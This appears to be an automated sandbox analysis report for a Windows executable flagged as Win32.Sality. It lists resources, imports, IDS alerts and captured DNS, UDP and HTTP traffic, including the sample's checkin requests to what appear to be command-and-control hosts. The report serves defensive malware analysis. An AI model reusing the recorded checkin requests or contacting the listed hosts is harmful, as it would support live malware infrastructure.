                                RT_ICON0x591780x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.42865853658536585
                                RT_ICON0x597e00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.5120967741935484
                                RT_ICON0x59ac80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.597972972972973
                                RT_ICON0x59bf00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.517590618336887
                                RT_ICON0x5aa980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6773465703971119
                                RT_ICON0x5b3400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4725433526011561
                                RT_ICON0x5b8a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.2846473029045643
                                RT_ICON0x5de500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.45872420262664165
                                RT_ICON0x5eef80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6046099290780141
                                RT_ICON0x5f3600xca8Device independent bitmap graphic, 32 x 64 x 24, image size 3072EnglishUnited States0.6493827160493827
                                RT_ICON0x600080xca8Device independent bitmap graphic, 32 x 64 x 24, image size 3072EnglishUnited States0.17530864197530865
                                RT_DIALOG0x60cb00x316dataArabicSaudi Arabia0.46582278481012657
                                RT_DIALOG0x60fc80x25cdataChineseTaiwan0.5480132450331126
                                RT_DIALOG0x612240x394dataCzechCzech Republic0.43231441048034935
                                RT_DIALOG0x615b80x328dataDanishDenmark0.44183168316831684
                                RT_DIALOG0x618e00x39adataGermanGermany0.4078091106290672
                                RT_DIALOG0x61c7c0x3cedataGreekGreece0.4548254620123203
                                RT_DIALOG0x6204c0x33cdataEnglishUnited States0.4335748792270531
                                RT_DIALOG0x623880x38adataFinnishFinland0.4227373068432671
                                RT_DIALOG0x627140x3cadataFrenchFrance0.41237113402061853
                                RT_DIALOG0x62ae00x36adataHebrewIsrael0.45308924485125857
                                RT_DIALOG0x62e4c0x426dataHungarianHungary0.4011299435028249
                                RT_DIALOG0x632740x352dataItalianItaly0.4294117647058823
                                RT_DIALOG0x635c80x2c2dataJapaneseJapan0.5453257790368272
                                RT_DIALOG0x6388c0x288dataKoreanNorth Korea0.5709876543209876
                                RT_DIALOG0x6388c0x288dataKoreanSouth Korea0.5709876543209876
                                RT_DIALOG0x63b140x3b2dataDutchNetherlands0.4069767441860465
                                RT_DIALOG0x63ec80x344dataNorwegianNorway0.44019138755980863
                                RT_DIALOG0x6420c0x338dataPolishPoland0.44902912621359226
                                RT_DIALOG0x645440x35cdataPortugueseBrazil0.4290697674418605
                                RT_DIALOG0x648a00x358dataRussianRussia0.44742990654205606
                                RT_DIALOG0x64bf80x380dataSlovakSlovakia0.4263392857142857
                                RT_DIALOG0x64f780x36cdataSwedishSweden0.4440639269406393
                                RT_DIALOG0x652e40x384dataThaiThailand0.4577777777777778
                                RT_DIALOG0x656680x3aedataTurkishTurkey0.42250530785562634
                                RT_DIALOG0x65a180x37cdataSlovenianSlovenia0.4304932735426009
                                RT_DIALOG0x65d940x24cdataChineseChina0.5561224489795918
                                RT_DIALOG0x65fe00x3b0dataSpanishMexico0.4004237288135593
                                RT_DIALOG0x663900x3a0dataPortuguesePortugal0.4051724137931034
                                RT_DIALOG0x667300x3c8data0.38739669421487605
                                RT_DIALOG0x66af80x286dataArabicSaudi Arabia0.43034055727554177
                                RT_DIALOG0x66d800x286dataChineseTaiwan0.43034055727554177
                                RT_DIALOG0x670080x286dataCzechCzech Republic0.43034055727554177
                                RT_DIALOG0x672900x286dataDanishDenmark0.43034055727554177
                                RT_DIALOG0x675180x286dataGermanGermany0.43034055727554177
                                RT_DIALOG0x677a00x286dataGreekGreece0.43034055727554177
                                RT_DIALOG0x67a280x286dataEnglishUnited States0.43034055727554177
                                RT_DIALOG0x67cb00x286dataFinnishFinland0.43034055727554177
                                RT_DIALOG0x67f380x286dataFrenchFrance0.43034055727554177
                                RT_DIALOG0x681c00x286dataHebrewIsrael0.43034055727554177
                                RT_DIALOG0x684480x286dataHungarianHungary0.43034055727554177
                                RT_DIALOG0x686d00x286dataItalianItaly0.43034055727554177
                                RT_DIALOG0x689580x286dataJapaneseJapan0.43034055727554177
                                RT_DIALOG0x68be00x286dataKoreanNorth Korea0.43034055727554177
                                RT_DIALOG0x68be00x286dataKoreanSouth Korea0.43034055727554177
                                RT_DIALOG0x68e680x286dataDutchNetherlands0.43034055727554177
                                RT_DIALOG0x690f00x286dataNorwegianNorway0.43034055727554177
                                RT_DIALOG0x693780x286dataPolishPoland0.43034055727554177
                                RT_DIALOG0x696000x286dataPortugueseBrazil0.43034055727554177
                                RT_DIALOG0x698880x286dataRussianRussia0.43034055727554177
                                RT_DIALOG0x69b100x286dataSlovakSlovakia0.43034055727554177
                                RT_DIALOG0x69d980x286dataSwedishSweden0.43034055727554177
                                RT_DIALOG0x6a0200x286dataThaiThailand0.43034055727554177
                                RT_DIALOG0x6a2a80x286dataTurkishTurkey0.43034055727554177
                                RT_DIALOG0x6a5300x286dataSlovenianSlovenia0.43034055727554177
                                RT_DIALOG0x6a7b80x286dataChineseChina0.43034055727554177
                                RT_DIALOG0x6aa400x286dataSpanishMexico0.43034055727554177
                                RT_DIALOG0x6acc80x286dataPortuguesePortugal0.43034055727554177
                                RT_DIALOG0x6af500x286data0.43034055727554177
                                RT_STRING0x6b1d80x7d0Targa image data 1575 x 1569 x 32 +1604 +1594ArabicSaudi Arabia0.2805
                                RT_STRING0x6b9a80x2c0Targa image data - Mono - RLE 73 x 65 x 32 +73 +68ChineseTaiwan0.6463068181818182
                                RT_STRING0x6bc680x7b6dataCzechCzech Republic0.31762917933130697
                                RT_STRING0x6c4200x8a0dataDanishDenmark0.2749094202898551
                                RT_STRING0x6ccc00xa62dataGermanGermany0.2618510158013544
                                RT_STRING0x6d7240xa7adataGreekGreece0.28448918717375093
                                RT_STRING0x6e1a00xae2Targa image data 73 x 65 x 32 +73 +68EnglishUnited States0.2663316582914573
                                RT_STRING0x6ec840x910Targa image data - RLE 73 x 65 x 32 +73 +68FinnishFinland0.2495689655172414
                                RT_STRING0x6f5940xa58dataFrenchFrance0.256797583081571
                                RT_STRING0x6ffec0x724dataHebrewIsrael0.30306345733041573
                                RT_STRING0x707100x970dataHungarianHungary0.29635761589403975
                                RT_STRING0x710800x900dataItalianItaly0.2690972222222222
                                RT_STRING0x719800x450Targa image data 73 x 65 x 32 +73 +68JapaneseJapan0.5018115942028986
                                RT_STRING0x71dd00x436dataKoreanNorth Korea0.5111317254174397
                                RT_STRING0x71dd00x436dataKoreanSouth Korea0.5111317254174397
                                RT_STRING0x722080x9e6dataDutchNetherlands0.27782162588792425
                                RT_STRING0x72bf00x8b4dataNorwegianNorway0.2751346499102334
                                RT_STRING0x734a40x8aadataPolishPoland0.2944093778178539
                                RT_STRING0x73d500x9c6dataPortugueseBrazil0.2685851318944844
                                RT_STRING0x747180x86edataRussianRussia0.3002780352177943
                                RT_STRING0x74f880x7d6dataSlovakSlovakia0.3135593220338983
                                RT_STRING0x757600x85cTarga image data 73 x 65 x 32 +73 +68SwedishSweden0.2841121495327103
                                RT_STRING0x75fbc0x8c2dataThaiThailand0.3050847457627119
                                RT_STRING0x768800x920dataTurkishTurkey0.2872431506849315
                                RT_STRING0x771a00x88cdataSlovenianSlovenia0.29570383912248627
                                RT_STRING0x77a2c0x2c4Targa image data - Map - RLE 73 x 65 x 32 +73 +68ChineseChina0.6384180790960452
                                RT_STRING0x77cf00x98adataSpanishMexico0.2571662571662572
                                RT_STRING0x7867c0x95cdataPortuguesePortugal0.2742070116861436
                                RT_STRING0x78fd80xa1cdata0.250386398763524
                                RT_STRING0x799f40x5cdataArabicSaudi Arabia0.7065217391304348
                                RT_STRING0x79a500x48dataChineseTaiwan0.7361111111111112
                                RT_STRING0x79a980x64dataCzechCzech Republic0.74
                                RT_STRING0x79afc0x54dataDanishDenmark0.7023809523809523
                                RT_STRING0x79b500x5cdataGermanGermany0.6739130434782609
                                RT_STRING0x79bac0x82dataGreekGreece0.6692307692307692
                                RT_STRING0x79c300x54dataEnglishUnited States0.6904761904761905
                                RT_STRING0x79c840x5cdataFinnishFinland0.6956521739130435
                                RT_STRING0x79ce00x64dataFrenchFrance0.65
                                RT_STRING0x79d440x4edataHebrewIsrael0.7307692307692307
                                RT_STRING0x79d940x76dataHungarianHungary0.7288135593220338
                                RT_STRING0x79e0c0x5cdataItalianItaly0.6739130434782609
                                RT_STRING0x79e680x54dataJapaneseJapan0.7619047619047619
                                RT_STRING0x79ebc0x4adataKoreanNorth Korea0.7567567567567568
                                RT_STRING0x79ebc0x4adataKoreanSouth Korea0.7567567567567568
                                RT_STRING0x79f080x6edataDutchNetherlands0.7090909090909091
                                RT_STRING0x79f780x54dataNorwegianNorway0.7023809523809523
                                RT_STRING0x79fcc0x62dataPolishPoland0.7040816326530612
                                RT_STRING0x7a0300x60dataPortugueseBrazil0.6041666666666666
                                RT_STRING0x7a0900x58dataRussianRussia0.7272727272727273
                                RT_STRING0x7a0e80x60dataSlovakSlovakia0.7395833333333334
                                RT_STRING0x7a1480x64dataSwedishSweden0.7
                                RT_STRING0x7a1ac0x66dataThaiThailand0.7549019607843137
                                RT_STRING0x7a2140x5edataTurkishTurkey0.7021276595744681
                                RT_STRING0x7a2740x5cdataSlovenianSlovenia0.6739130434782609
                                RT_STRING0x7a2d00x4adataChineseChina0.7432432432432432
                                RT_STRING0x7a31c0x70dataSpanishMexico0.6607142857142857
                                RT_STRING0x7a38c0x72dataPortuguesePortugal0.6491228070175439
                                RT_STRING0x7a4000x74data0.646551724137931
                                RT_ACCELERATOR0x7a4740x8dataEnglishUnited States2.0
                                RT_GROUP_ICON0x7a47c0x84dataEnglishUnited States0.6363636363636364
                                RT_GROUP_ICON0x7a5000x14dataEnglishUnited States1.25
                                RT_GROUP_ICON0x7a5140x14dataEnglishUnited States1.25
                                RT_VERSION0x7a5280x310dataArabicSaudi Arabia0.4375
                                RT_MANIFEST0x7a8380x281ASCII text, with CRLF line terminatorsEnglishUnited States0.4711388455538221

                                Imports

                                DLLImport
                                VERSION.dllGetFileVersionInfoA, GetFileVersionInfoSizeA, VerQueryValueA
                                SETUPAPI.dllSetupDiGetDeviceRegistryPropertyA, SetupDiEnumDeviceInfo, SetupDiGetClassDevsA, SetupDiGetDeviceInstanceIdA, SetupDiClassGuidsFromNameA, SetupDiGetINFClassA, SetupDiGetDeviceInstallParamsA, SetupDiCallClassInstaller, SetupDiEnumDriverInfoA, SetupDiBuildDriverInfoList, SetupDiSetDeviceInstallParamsA, SetupDiRegisterDeviceInfo, SetupDiSetDeviceRegistryPropertyA, SetupDiCreateDeviceInfoA, SetupDiCreateDeviceInfoList, SetupDiDestroyDriverInfoList, SetupDiSetSelectedDevice, SetupDiGetDriverInfoDetailA, SetupDiRemoveDevice, SetupDiDestroyDeviceInfoList
                                COMCTL32.dll
                                SHLWAPI.dllPathAppendA, PathUnquoteSpacesA, PathIsDirectoryA, PathIsRelativeA
                                KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, CreateProcessA, FindClose, FindNextFileA, SetLastError, FindFirstFileA, GetSystemDirectoryA, GetProcAddress, GetModuleHandleA, Sleep, GetModuleFileNameA, SetCurrentDirectoryA, GetFullPathNameA, DeleteFileA, SetFileAttributesA, GetFileAttributesA, GetVersionExA, GetComputerNameA, GetUserDefaultLangID, GetCurrentDirectoryA, GetWindowsDirectoryA, GetCurrentProcess, ReleaseMutex, CreateDirectoryA, MapViewOfFile, CreateFileMappingA, CreateMutexA, UnmapViewOfFile, GetTimeFormatA, GetLocalTime, OutputDebugStringA, lstrcpynA, MoveFileExA, LocalAlloc, GetCurrentThread, FreeLibrary, SetEnvironmentVariableA, Module32First, CreateToolhelp32Snapshot, Process32Next, Process32First, GetLastError, OpenProcess, MultiByteToWideChar, DeviceIoControl, CreateFileA, CloseHandle, GlobalFree, GlobalUnlock, GlobalLock, GlobalAlloc, CopyFileA, GetCurrentProcessId, GetCurrentThreadId, RemoveDirectoryA, WriteFile, SetFilePointer, DeleteCriticalSection, GetFileType, GetStdHandle, SetHandleCount, LeaveCriticalSection, EnterCriticalSection, RaiseException, LCMapStringW, WideCharToMultiByte, LCMapStringA, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, IsValidCodePage, ReadFile, GetOEMCP, GetACP, InterlockedDecrement, InterlockedIncrement, GetCPInfo, GetStartupInfoA, GetProcessHeap, HeapAlloc, FormatMessageA, LocalFree, LoadLibraryA, InitializeCriticalSection, GetConsoleCP, GetConsoleMode, GetPrivateProfileStringA, WinExec, FlushFileBuffers, GetSystemTimeAsFileTime, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, HeapReAlloc, HeapSize, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, TerminateProcess, GetCommandLineA, RtlUnwind, HeapFree, CompareStringW, CompareStringA, SetEndOfFile, SetStdHandle, ExitProcess
                                USER32.dllEndDeferWindowPos, MessageBoxA, LoadStringA, LoadImageA, BeginDeferWindowPos, GetWindowRect, UpdateWindow, ShowWindow, GetClientRect, GetSystemMetrics, SendMessageA, OffsetRect, CopyRect, GetParent, CheckDlgButton, SetDlgItemTextA, GetDlgItem, EnableWindow, IsDlgButtonChecked, LoadBitmapA, GetWindowThreadProcessId, EnumWindows, DialogBoxParamA, GetWindowInfo, ExitWindowsEx, CreateWindowExA, SetWindowPos, GetDesktopWindow, DeferWindowPos, EndDialog
                                ADVAPI32.dllOpenSCManagerA, OpenServiceA, ControlService, QueryServiceStatus, DeleteService, CloseServiceHandle, ImpersonateSelf, OpenThreadToken, AllocateAndInitializeSid, InitializeSecurityDescriptor, GetLengthSid, InitializeAcl, AddAccessAllowedAce, SetSecurityDescriptorDacl, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, IsValidSecurityDescriptor, AccessCheck, RevertToSelf, FreeSid, RegDeleteValueA, RegEnumValueA, RegEnumKeyExA, RegQueryInfoKeyA, RegDeleteKeyA, LookupPrivilegeValueA, OpenProcessToken, AdjustTokenPrivileges, RegSetValueExA, GetUserNameA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, RegCreateKeyExA
                                SHELL32.dllSHGetSpecialFolderPathA, SHGetFolderPathA
                                ole32.dllCoUninitialize, CoCreateInstance, CoInitialize, CoSetProxyBlanket
                                OLEAUT32.dllSysStringLen, SysAllocStringLen, SysFreeString

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                ArabicSaudi Arabia
                                EnglishUnited States
                                ChineseTaiwan
                                CzechCzech Republic
                                DanishDenmark
                                GermanGermany
                                GreekGreece
                                FinnishFinland
                                FrenchFrance
                                HebrewIsrael
                                HungarianHungary
                                ItalianItaly
                                JapaneseJapan
                                KoreanNorth Korea
                                KoreanSouth Korea
                                DutchNetherlands
                                NorwegianNorway
                                PolishPoland
                                PortugueseBrazil
                                RussianRussia
                                SlovakSlovakia
                                SwedishSweden
                                ThaiThailand
                                TurkishTurkey
                                SlovenianSlovenia
                                ChineseChina
                                SpanishMexico
                                PortuguesePortugal

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                2024-07-25T13:45:08.202500+0200TCP2018340ET MALWARE Win32.Sality-GR Checkin4971080192.168.2.8107.172.18.180
                                2024-07-25T13:45:06.951501+0200TCP2018340ET MALWARE Win32.Sality-GR Checkin4970980192.168.2.8193.109.247.16
                                2024-07-25T13:45:22.156809+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971513.85.23.86192.168.2.8
                                2024-07-25T13:46:00.464743+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972213.85.23.86192.168.2.8

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jul 25, 2024 13:45:06.189862013 CEST4970980192.168.2.8193.109.247.16
                                Jul 25, 2024 13:45:06.194993973 CEST8049709193.109.247.16192.168.2.8
                                Jul 25, 2024 13:45:06.198146105 CEST4970980192.168.2.8193.109.247.16
                                Jul 25, 2024 13:45:06.198146105 CEST4970980192.168.2.8193.109.247.16
                                Jul 25, 2024 13:45:06.203036070 CEST8049709193.109.247.16192.168.2.8
                                Jul 25, 2024 13:45:06.935741901 CEST8049709193.109.247.16192.168.2.8
                                Jul 25, 2024 13:45:06.936081886 CEST8049709193.109.247.16192.168.2.8
                                Jul 25, 2024 13:45:06.936094046 CEST8049709193.109.247.16192.168.2.8
                                Jul 25, 2024 13:45:06.937660933 CEST8049709193.109.247.16192.168.2.8
                                Jul 25, 2024 13:45:06.951500893 CEST4970980192.168.2.8193.109.247.16
                                Jul 25, 2024 13:45:07.082715034 CEST8049709193.109.247.16192.168.2.8
                                Jul 25, 2024 13:45:07.083062887 CEST8049709193.109.247.16192.168.2.8
                                Jul 25, 2024 13:45:07.083090067 CEST8049709193.109.247.16192.168.2.8
                                Jul 25, 2024 13:45:07.088684082 CEST4970980192.168.2.8193.109.247.16
                                Jul 25, 2024 13:45:07.702261925 CEST4971080192.168.2.8107.172.18.180
                                Jul 25, 2024 13:45:07.708283901 CEST8049710107.172.18.180192.168.2.8
                                Jul 25, 2024 13:45:07.708523035 CEST4971080192.168.2.8107.172.18.180
                                Jul 25, 2024 13:45:07.708813906 CEST4971080192.168.2.8107.172.18.180
                                Jul 25, 2024 13:45:07.716794014 CEST8049710107.172.18.180192.168.2.8
                                Jul 25, 2024 13:45:08.191555023 CEST8049710107.172.18.180192.168.2.8
                                Jul 25, 2024 13:45:08.202500105 CEST4971080192.168.2.8107.172.18.180
                                Jul 25, 2024 13:45:08.223803043 CEST49712443192.168.2.8195.201.126.132
                                Jul 25, 2024 13:45:08.223840952 CEST44349712195.201.126.132192.168.2.8
                                Jul 25, 2024 13:45:08.227215052 CEST49712443192.168.2.8195.201.126.132
                                Jul 25, 2024 13:45:08.242625952 CEST49712443192.168.2.8195.201.126.132
                                Jul 25, 2024 13:45:08.242655993 CEST44349712195.201.126.132192.168.2.8
                                Jul 25, 2024 13:45:08.933650017 CEST44349712195.201.126.132192.168.2.8
                                Jul 25, 2024 13:45:08.933916092 CEST49712443192.168.2.8195.201.126.132
                                Jul 25, 2024 13:45:09.923372984 CEST4970980192.168.2.8193.109.247.16
                                Jul 25, 2024 13:45:09.923602104 CEST4971080192.168.2.8107.172.18.180
                                Jul 25, 2024 13:45:09.923697948 CEST49712443192.168.2.8195.201.126.132

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jul 25, 2024 13:45:02.513236046 CEST501521743192.168.2.894.76.218.18
                                Jul 25, 2024 13:45:03.069250107 CEST501531743192.168.2.894.76.206.216
                                Jul 25, 2024 13:45:03.622994900 CEST501548040192.168.2.8189.68.58.176
                                Jul 25, 2024 13:45:04.092767954 CEST501556724192.168.2.881.190.94.112
                                Jul 25, 2024 13:45:04.615726948 CEST501564956192.168.2.877.122.85.173
                                Jul 25, 2024 13:45:05.162873983 CEST501576820192.168.2.8201.45.100.171
                                Jul 25, 2024 13:45:05.694794893 CEST501585630192.168.2.8217.70.126.141
                                Jul 25, 2024 13:45:05.994374037 CEST5396353192.168.2.81.1.1.1
                                Jul 25, 2024 13:45:06.092278957 CEST53539631.1.1.1192.168.2.8
                                Jul 25, 2024 13:45:06.119759083 CEST5541353192.168.2.81.1.1.1
                                Jul 25, 2024 13:45:06.171686888 CEST53554131.1.1.1192.168.2.8
                                Jul 25, 2024 13:45:06.242580891 CEST554145569192.168.2.881.10.9.50
                                Jul 25, 2024 13:45:06.763325930 CEST554154580192.168.2.894.50.7.74
                                Jul 25, 2024 13:45:07.201972961 CEST5473153192.168.2.81.1.1.1
                                Jul 25, 2024 13:45:07.302602053 CEST547327886192.168.2.877.39.42.64
                                Jul 25, 2024 13:45:07.556024075 CEST53547311.1.1.1192.168.2.8
                                Jul 25, 2024 13:45:07.565112114 CEST6191853192.168.2.81.1.1.1
                                Jul 25, 2024 13:45:07.700921059 CEST53619181.1.1.1192.168.2.8
                                Jul 25, 2024 13:45:07.837656021 CEST619197886192.168.2.880.69.51.98
                                Jul 25, 2024 13:45:08.206958055 CEST6310153192.168.2.81.1.1.1
                                Jul 25, 2024 13:45:08.216058969 CEST53631011.1.1.1192.168.2.8

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Jul 25, 2024 13:45:05.994374037 CEST192.168.2.81.1.1.10xec95Standard query (0)lpbmx.ruA (IP address)IN (0x0001)false
                                Jul 25, 2024 13:45:06.119759083 CEST192.168.2.81.1.1.10x705Standard query (0)macedonia.my1.ruA (IP address)IN (0x0001)false
                                Jul 25, 2024 13:45:07.201972961 CEST192.168.2.81.1.1.10xb470Standard query (0)jrsx.jre.net.cnA (IP address)IN (0x0001)false
                                Jul 25, 2024 13:45:07.565112114 CEST192.168.2.81.1.1.10x4fbcStandard query (0)steamboy.h17.ruA (IP address)IN (0x0001)false
                                Jul 25, 2024 13:45:08.206958055 CEST192.168.2.81.1.1.10x8a54Standard query (0)www.otzywy.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Jul 25, 2024 13:45:06.092278957 CEST1.1.1.1192.168.2.80xec95Name error (3)lpbmx.runonenoneA (IP address)IN (0x0001)false
                                Jul 25, 2024 13:45:06.171686888 CEST1.1.1.1192.168.2.80x705No error (0)macedonia.my1.ru193.109.247.16A (IP address)IN (0x0001)false
                                Jul 25, 2024 13:45:07.556024075 CEST1.1.1.1192.168.2.80xb470Name error (3)jrsx.jre.net.cnnonenoneA (IP address)IN (0x0001)false
                                Jul 25, 2024 13:45:07.700921059 CEST1.1.1.1192.168.2.80x4fbcNo error (0)steamboy.h17.ru107.172.18.180A (IP address)IN (0x0001)false
                                Jul 25, 2024 13:45:08.216058969 CEST1.1.1.1192.168.2.80x8a54No error (0)www.otzywy.comotzywy.comCNAME (Canonical name)IN (0x0001)false
                                Jul 25, 2024 13:45:08.216058969 CEST1.1.1.1192.168.2.80x8a54No error (0)otzywy.com195.201.126.132A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • macedonia.my1.ru
                                • steamboy.h17.ru

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.849709193.109.247.16807092C:\Users\user\Desktop\LisectAVT_2403002B_38.exe
                                TimestampBytes transferredDirectionData
                                Jul 25, 2024 13:45:06.198146105 CEST140OUTGET /mainh.gif?7231d3=37419295 HTTP/1.1
                                User-Agent: Opera/8.89 (Windows NT 6.0; U; en)
                                Host: macedonia.my1.ru
                                Cache-Control: no-cache
                                Jul 25, 2024 13:45:06.935741901 CEST1236INHTTP/1.1 404 Not Found
                                Server: nginx/1.8.0
                                Date: Thu, 25 Jul 2024 11:45:05 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Keep-Alive: timeout=15
                                Data Raw: 31 63 36 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 54 54 50 20 34 30 34 20 52 65 73 6f 75 72 63 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 20 66 6f 6e 74 3a 20 31 32 70 78 2f 32 32 70 78 20 27 56 65 72 64 61 6e 61 27 3b 20 63 6f 6c 6f 72 3a 20 23 36 38 36 38 36 38 3b 7d 0a 62 6f 64 79 20 61 20 7b 63 6f 6c 6f 72 3a 20 23 33 32 61 32 63 66 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 7d 0a 62 6f 64 79 20 61 3a 68 6f 76 65 72 20 [TRUNCATED]
                                Data Ascii: 1c6a<!DOCTYPE html><html><head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>HTTP 404 Resource not found</title><style type="text/css">body {margin: 0; padding: 0; background: #fff; font: 12px/22px 'Verdana'; color: #686868;}body a {color: #32a2cf; text-decoration: underline;}body a:hover {text-decoration: none;}td, input, select, textarea {font: 12px /22px 'Verdana'; color: #686868;}.clear {clear: both;}.content {width: 735px; margin: auto;}/*--------header------*/#header {height: 55px; background: url(/.s/img/err/404-header-line.gif) repeat-x 0 40px;}#logo {float: left; margin: 0; padding: 26px 0 0 0; width: 43px; height: 27px;}#logo a {display: block; padding: 0 9px; width: 43px; height: 27px; overflow: hidden; outline: none; text-indent: -9999px; background: #fff url(/.s/img/err/404-logo.png) no-repeat center center;}.site-create {float: right; margin: 26px 0 0 0; display: block; padding: 0 5px 0 15px; font: 11px/26px 'Verdana'; color: #6 [TRUNCATED]
                                Jul 25, 2024 13:45:06.936081886 CEST1236INData Raw: 75 72 6c 28 2f 2e 73 2f 69 6d 67 2f 65 72 72 2f 34 30 34 2d 61 72 72 6f 77 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 20 31 30 70 78 3b 7d 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0a 2f 2a 2d 2d
                                Data Ascii: url(/.s/img/err/404-arrow.png) no-repeat left 10px;}/*--------------------*//*--------main--------*/#main {padding: 50px 0 55px 0;}.main-left {float: left; width: 160px; text-align: center;}.errortitle {font: 18px/24px 'Verdana'; color: #
                                Jul 25, 2024 13:45:06.936094046 CEST1236INData Raw: 63 68 69 6c 64 2b 68 74 6d 6c 20 2e 73 65 61 72 63 68 73 62 6d 20 7b 62 6f 72 64 65 72 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 66 6f
                                Data Ascii: child+html .searchsbm {border: 0 !important;}/*--------------------*//*-------footer-------*/#footer {padding: 15px 0 0 0; border-top: 1px solid #dbdbdb;}.footer-col {float: left; width: 24.9%;}.footer-col h4 { margin: 0 0 15px 0; font: 1
                                Jul 25, 2024 13:45:06.937660933 CEST672INData Raw: 73 63 61 70 65 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 2b 28 28 74 79 70 65 6f 66 28 73 63 72 65 65 6e 29 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 3f 22 22 3a 22 3b 73 22 2b 73 63 72 65 65 6e 2e 77 69 64 74 68 2b 22 2a 22 2b 73
                                Data Ascii: scape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script>.../LiveInternet-->... Yandex.M
                                Jul 25, 2024 13:45:07.082715034 CEST1236INData Raw: 73 63 72 69 70 74 22 3b 0a 20 20 20 20 73 2e 61 73 79 6e 63 20 3d 20 74 72 75 65 3b 0a 20 20 20 20 73 2e 73 72 63 20 3d 20 28 64 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 20 3d 3d 20 22 68 74 74 70 73 3a 22 20 3f 20 22 68 74 74 70 73
                                Data Ascii: script"; s.async = true; s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f); } else { f(); }
                                Jul 25, 2024 13:45:07.083062887 CEST1236INData Raw: 73 73 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 3b 3c 2f 6c 69 3e 0a 3c 6c 69 3e 2d 20 75 73 65 20 74 68 65 20 57 65 62 20 73 65 61 72 63 68 20 61 6e 64 20 66 69 6e 64 20 77 68 61 74 20 79 6f 75 20 77 65 72 65 20 6c 6f 6f 6b 69 6e
                                Data Ascii: ss in the address bar;</li><li>- use the Web search and find what you were looking for:</li></ul><div id="search"><form action="https://google.com/search" method="get"><input type="text" class="searchword" name="q" /><input type="submit"
